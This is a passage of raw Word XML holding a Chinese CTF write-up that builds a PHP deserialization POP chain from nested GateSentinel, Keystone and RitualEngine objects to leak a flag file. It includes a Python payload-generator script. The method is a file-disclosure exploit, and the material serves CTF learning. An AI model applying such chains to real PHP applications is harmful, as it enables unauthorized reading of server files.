        <w:t xml:space="preserve">12.6 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">终局：利用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完成文件泄露</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只要我们在构造时将最后这个对象的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性精准定位于：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;relic&gt;.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目标文件的源码便会通过高亮机制直接暴露在我们面前。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header-n334"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">剖析阶段二中“双重</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">GateSentinel”套娃的必要性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这个地方往往是新手入门</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> POP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">链构造时最爱踩坑的盲区。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="44" w:name="header-n336"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">13.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">仅依赖单层结构的死胡同</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不妨回顾一下我们达成目标的必要前置条件：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必须依靠最外部的对象在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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">结束之际自发地回调</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__wakeup()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必须依靠该</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__wakeup()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数内的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">preg_match()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制，强行去读取某个内嵌“对象”的字符串表达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唯有如此操作，方能顺畅衔接至后续的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__toString()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节点</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">由此推导出的最佳实践策略便是套娃操作：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最外部包裹一层：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GateSentinel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将外部实例的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性：再塞入一个新的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GateSentinel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实例</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如此构建的传导链路为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">外层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> GateSentinel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">反序列化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外层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> __wakeup</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; preg_match( ..., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内层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GateSentinel对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> )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内层</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> __toString</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这套打法的精妙之处在于，完美解耦了作为“导火索”的触发入口与实际承载“业务推进”的执行实体。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header-n355"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">阶段二</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">拓扑结构的逆向推演</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在组装这类复杂结构时，最稳妥的方案是“由果溯因、自底向上”进行堆叠。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="46" w:name="header-n357"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">核心层：充当文件窃取者的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RitualEngine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们首先需要捏造一个身处最底层的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RitualEngine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实体，其存在意义极度单一：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$target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"&lt;relic&gt;.txt"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">确保一旦系统唤醒其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方法，它就会毫无偏颇地读取该目标。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以简写为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RitualEngine(target="&lt;relic&gt;.txt")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="47" w:name="header-n364"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">倒数第二层：接管</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__invoke()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RitualEngine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">紧接着需要备妥第二个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RitualEngine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。该实例本身并不参与文件读取，它的职能是在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__invoke()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被触发时展开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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的解析任务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">我们需要事先向其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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">投喂经过序列化的特定文本，以确保其反解后呈现如下形态：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上面那个真正读文件的 RitualEngine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;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"view"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得益于内部预设的白名单转换字典，这里的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"view"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将平滑过渡为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">"run"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可以简写为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RitualEngine(callback=serialize([RitualEngine(target="&lt;relic&gt;.txt"), "view"]))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="48" w:name="header-n372"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">倒数第三层：中转站</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Keystone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Keystone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实例内部的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rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性绑定给上述负责解包回调的那个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RitualEngine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这么一来，当外界强行向</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Keystone</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">索要不存在的成员变量时，自然会引起连锁反应：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Keystone::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-&gt; 调用 center()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; 进入 RitualEngine::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48"/>
    <w:bookmarkStart w:id="49" w:name="header-n377"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">倒数第四层：内圈</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GateSentinel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接着处理内圈的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GateSentinel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节点，赋予其以下属性：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object</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置为任意无害的常规字符（例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">safe.txt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tool['blade']</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">指针关联至上一步组装好的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Keystone</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">如此这般，当内圈的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__toString()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">被唤醒时：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-&gt;tool[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'blade'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]-&gt;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这一行代码便会成为点燃剩余所有连环炸药的引信。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="header-n388"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">14.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表层外壳：外圈</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GateSentinel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">最后，将最外围的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">GateSentinel-&gt;object</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">属性直接覆盖为前一个步骤制作的“内圈</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GateSentinel </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">实体”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">这样一来，反序列化伊始执行的最外层</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__wakeup()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preg_match()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，就会因为需要处理正则匹配而不得不将该内圈实体强制文本化，进而激活内圈的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">__toString()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header-n392"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">15. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过脚本自动化生成阶段二的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">考虑到这种重重嵌套的序列化报文只要人工手算极易发生偏差，在实际解题和演示中，强烈建议采取编写脚本的辅助方式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以下为我在实战中所用到的轻量级</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成代码：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f's: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";'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o(cls, props):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.join(s(k)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f'O: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":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(props)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arr_assoc(items):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.join(s(k)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f'a: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arr_idx(items):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f'i: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(items))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f'a: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real_reader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o(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'RitualEngine'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, s(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'&lt;relic&gt;.txt'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callback_array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arr_idx([</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    real_reader,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    s(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invoker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o(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'RitualEngine'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'callback'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, s(callback_array)),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o(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Keystone'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invoker),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o(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'GateSentinel'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s(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'safe.txt'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, arr_assoc([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'blade'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, key),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    ])),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outer_gate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o(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'GateSentinel'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inner_gate),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(outer_gate)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在此顺便强调一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CTF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选手的优良习惯：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">面对复杂的嵌套结构时，永远不要头铁去徒手捏造序列化文本。能通过脚本自动演算生成的，坚决不上手盲敲。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">哪怕仅仅是因为一位数的长度计算失误，也会导致整段精心设计的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">沦为一堆无用的废代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkStart w:id="53" w:name="header-n401"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">16. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
